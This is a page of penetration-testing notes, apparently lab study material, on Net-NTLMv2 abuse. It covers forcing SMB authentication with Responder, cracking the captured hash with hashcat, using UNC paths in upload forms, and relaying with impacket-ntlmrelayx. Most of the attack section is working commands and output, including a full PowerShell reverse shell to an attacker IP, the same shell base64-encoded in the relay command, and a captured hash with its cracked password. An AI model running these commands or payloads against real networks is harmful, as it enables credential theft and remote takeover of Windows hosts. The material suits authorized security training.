NTLMv2

If we gain access as an unprivileged user and cannot use tools like , we can abuse the Net-NTLMv2 network authentication protocol which is responsible for managing the authentication process for Windows clients and servers over a network.

Net-NTLMv2 exists on almost all Windows environments for combatibility purposes and it's less secure than the more modern Kerberos protocols.

SMB Authentication

Direct SMB Auth

We'll send the server a request, outlining the connection details to access the SMB share.
Then the server will send us a challenge in which we encrypt data for our response with our NTLM hash to prove our identity.
The server will then check our challenge response and either grant or deny access, accordingly.

We can force this using responder by connecting from the target to its SMB server as shown below:

# achieving RCE as a non-privileged user
$ nc 192.168.235.211 4444
Microsoft Windows [Version 10.0.20348.707]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
files01\paul

C:\Windows\system32>net user paul
net user paul
User name                    paul
Full Name                    paul power
<SNIP>

Local Group Memberships      *Remote Desktop Users *Users

# launching the SMB server on the attacking machine
$ sudo responder -I tun0

# connecting to a non-existent share to force authentication
C:\Windows\system32>dir \\192.168.45.186\test
dir \\192.168.45.186\test
Access is denied.

# capturing the Net-NTLMv2 with responder
[SMB] NTLMv2-SSP Client   : 192.168.235.211
[SMB] NTLMv2-SSP Username : FILES01\paul
[SMB] NTLMv2-SSP Hash     : paul::FILES01:91d195901d36c03d:291C9E3E12771174CD6286D657C2C0C9:010100000000000080850BA812A2DB01710884AB8C24419C0000000002000800330059005400520001001E00570049004E002D004300430056004300500057005700520039003900410004003400570049004E002D00430043005600430050005700570052003900390041002E0033005900540052002E004C004F00430041004C000300140033005900540052002E004C004F00430041004C000500140033005900540052002E004C004F00430041004C000700080080850BA812A2DB0106000400020000000800300030000000000000000000000000200000104E03C87D48BBB6D80BF2579BC979DA56B1D0BDBF6575FD55E2565FF6CACFD00A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100380036000000000000000000

# cracking the NTLMv2 hash
$ hashcat -m5600 paul_hash /usr/share/wordlists/rockyou.txt
<SNIP>

PAUL::FILES01:91d<SNIP>000:123Password123

SMB Auth via Upload

If we haven't achieved RCE, we could check for a file upload form in a web application on a Windows server and enter a non-existing file with a UNC path such as \\<attacker-IP>\share\nonexistent.txt. If the web app supports SMB uploads, the Windows server will authenticate to our SMB server.

UNC Path Interpretation:
Powershell interprets UNC paths directly: \\server\share.
Web requests interpret UNC paths according to the programming language used. Most of them treat \ as an escape character, thus, it needs to be doubled in order to make it a literal: \\\\server\\share.

NTMLv2 Relay

We have achieved RCE as file02admin on FILES01. Based on the name, we hypothesize that this account would be a local admin on FILES02. We have the NTLMv2 of this user, but it is uncrackable.

In this example we don't use the local Administrator user for the relay attack as we did for the PtH attack. Therefore, the target system needs to have UAC remote restrictions disabled or the command execution will fail. If UAC remote restrictions are enabled on the target then we can only use the local Administrator user for the relay attack.

Our goal now is to start an SMB server on the attacking machine using the impacket-ntlmrelayx script and instruct it to relay the command passed, in this case the reverse shell payload, along with the NTMLv2 hash to our target machine (FILES02). We can use cyberchef to Base64-encode the revese shell payload.

# reverse shell payload
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.186',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()as

# relay the payload to the FILES02 machine
$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.235.212 -c "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADQANQAuADEAOAA2ACcALAA4ADAAOAAwACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAiAC4AIAB7ACAAJABkAGEAdABhACAAfQAgADIAPgAmADEAIgAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACAAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="

# start a listener on the attacking machine
$ nc -nvlp 8080

# RCE on the FILES01 machine
$ nc 192.168.235.211 5555
Microsoft Windows [Version 10.0.20348.707]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
files01\files02admin

# connect to a non-existent share to force authentication
C:\Windows\system32>dir \\192.168.45.186\test
dir \\192.168.45.186\test
The network name cannot be found.

$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.235.212 -c "powershell -enc JABjAGwAa<SNIP>=="
<SNIP>

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.235.211, attacking target smb://192.168.235.212
[*] Authenticating against smb://192.168.235.212 as FILES01/FILES02ADMIN SUCCEED
[*] All targets processed!

# RCE on FILES02
$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [192.168.45.186] from (UNKNOWN) [192.168.235.212] 65367
PS C:\users\files02admin\desktop> whoami
nt authority\system

PreviousLocal SAM Dump NextServices

Last updated 1 month ago

Was this helpful?